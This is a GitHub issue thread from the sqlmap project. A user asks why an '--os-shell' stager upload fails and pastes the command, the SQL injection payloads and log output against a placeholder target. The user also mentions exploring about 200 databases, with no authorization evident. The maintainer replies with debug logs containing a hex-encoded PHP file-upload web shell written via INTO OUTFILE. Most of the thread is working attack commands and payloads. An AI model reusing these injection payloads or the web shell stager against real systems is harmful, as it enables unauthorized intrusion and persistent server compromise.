Unable to load stager: "no input file specified"

[emilyanncr]

I have been unsuccessful in uploading a stager using sqlmap command --os-shell. When attempting, I receive the following warning "no input file specified". Can you please advice? I'd appreciate it. Here are the details:

This is exactly what I'm running
-r target.txt --time-sec 50 --hex --threads 9 -v 1 -o --os-shell

http://target.com/merchant.IHTML

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=3 AND 6384=6384&prodstring=:prodstring&step=2&Up=Next201&ViewFrom=4

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=3 AND SLEEP(50)&prodstring=:prodstring&step=2&Up=Next201&ViewFrom=4

---

[23:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: MySQL 5
[23:44:31] [INFO] going to use a web backdoor for command prompt
[23:44:31] [INFO] fingerprinting the back-end DBMS operating system
[23:44:31] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

4
[23:44:36] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for writable directory?
[1] common location(s) '/var/www/' (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

4
[23:48:25] [INFO] heuristics detected web page charset 'ascii'
[23:55:29] [INFO] trying to upload the file stager on '/var/www/vhosts/target.com' via LIMIT 'LINES TERMINATED BY' technique
[23:48:25] [WARNING] unable to upload the file stager on '/var/www/vhosts/target.com' via LIMIT 'LINES TERMINATED BY' technique
[DEBUG:] No input file specified

No paths were disclosed in the source code and the site is only 1 deep...for example target.com/a, target.com/b, target.com/c

My Operating System:
Windows 8.1 (rolls eyes)

[stamparm]

To me it seems that you are not using the latest revision from our repository. I am not able to reproducible this behaviour:

...
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/www/build/tmpunohx.php'
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/build/tmpunohx.php'
[10:25:16] [WARNING] unable to upload the file stager on '/srv/www/www/build'
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/tmpunohx.php'
[10:25:16] [INFO] trying to upload the file stager on '/sqlmap/mysql' via LIMIT 'LINES TERMINATED BY' method
[10:25:16] [PAYLOAD] 1 LIMIT 0,1 INTO OUTFILE '/sqlmap/mysql/tmpunohx.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f73716c6d61702f6d7973716c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- 
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/sqlmap/mysql/tmpunohx.php'
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/mysql/tmpunohx.php'
[10:25:16] [WARNING] unable to upload the file stager on '/sqlmap/mysql'
[10:25:16] [DEBUG] trying to see if the file is accessible from 'http://172.16.93.131:80/tmpunohx.php'
...

[stamparm]

Also, it seems that you are dealing perhaps with the false positive or too lagging target:

web application technology: Microsoft IIS 6.0
->
[23:44:31] [INFO] the back-end DBMS operating system is Linux

[emilyanncr]

Yeah I was really surprised when I saw it say "Linux" when I called the
os-shell, that's the first time it said anything about Linux and I've been
all over those databases. There's close to 200 with hundreds of tables for
each.... So anyway when calling the os-shell I've specified directories
specific to Microsoft to see if that would work but unfortunately no
luck..... hmmmm

On Thu, Sep 11, 2014 at 1:28 AM, Miroslav Stampar [email protected]
wrote:

Also, it seems that you are dealing perhaps with the false positive:

web application technology: Microsoft IIS 6.0
->
[23:44:31] [INFO] the back-end DBMS operating system is Linux

—
Reply to this email directly or view it on GitHub
#824 (comment)
.

[emilyanncr]

:o I wish I could hug you

On Thu, Sep 11, 2014 at 1:27 AM, Miroslav Stampar [email protected]
wrote:

To me it seems that you are not using the latest revision from our
repository. I am not able to reproducible this behaviour:

`
...
[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/www/build/tmpunohx.php'
[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/build/tmpunohx.php'
[10:25:16] [WARNING] unable to upload the file stager on
'/srv/www/www/build'
[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/tmpunohx.php'
[10:25:16] [INFO] trying to upload the file stager on '/sqlmap/mysql' via
LIMIT 'LINES TERMINATED BY' method
[10:25:16] [PAYLOAD] 1 LIMIT 0,1 INTO OUTFILE '/sqlmap/mysql/tmpunohx.php'
LINES TERMINATED BY
0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7
46970617
2742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f73716c6d61702f6d7973716c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--

[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/sqlmap/mysql/tmpunohx.php'
[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/mysql/tmpunohx.php'
[10:25:16] [WARNING] unable to upload the file stager on '/sqlmap/mysql'
[10:25:16] [DEBUG] trying to see if the file is accessible from '
http://172.16.93.131:80/tmpunohx.php'
...

—
Reply to this email directly or view it on GitHub
#824 (comment)
.